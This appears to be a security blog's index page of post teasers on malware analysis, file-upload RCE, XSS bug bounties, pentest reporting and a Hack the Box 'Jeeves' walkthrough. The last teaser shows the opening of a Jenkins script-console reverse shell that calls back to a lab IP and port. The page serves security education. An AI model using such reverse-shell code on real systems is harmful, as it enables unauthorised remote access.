OWASP Newcastle Webinar - 5th May 2020
Earlier this year I did an internal presentation to my colleagues at Pentest Ltd on the topic of Malware Analysis and Intelligence Recon. The presentation was »
File Upload to Remote Code Execution
In this post, I will walk you through a real life example of how I was able to compromise a web application and achieve remote code »
Bugbounty Tips - Zseano Live Mentoring Series - XSS
Over the weekend I participated in @zseanos live stream bug bounty mentoring session in which he created an application for viewers to hack live and submit »
Reflected XSS on driver.grab.com
Thought I would do a quick write up of a small bug that I found late last year (2018). Unfortunately, the bug was considered out of »
A Beginners guide to Pen Test Reporting
With a few exceptions, the majority of books I have read about pen testing treat reporting as an after thought, with a few pages roughly detailing »
Hack the Box - Jeeves Walkthrough
Interface found via Dirbuster http://10.10.10.63:50000/askjeeves/ Initial Shell manage jenkins > script console String host="10.10.15.126"; int port=8044; »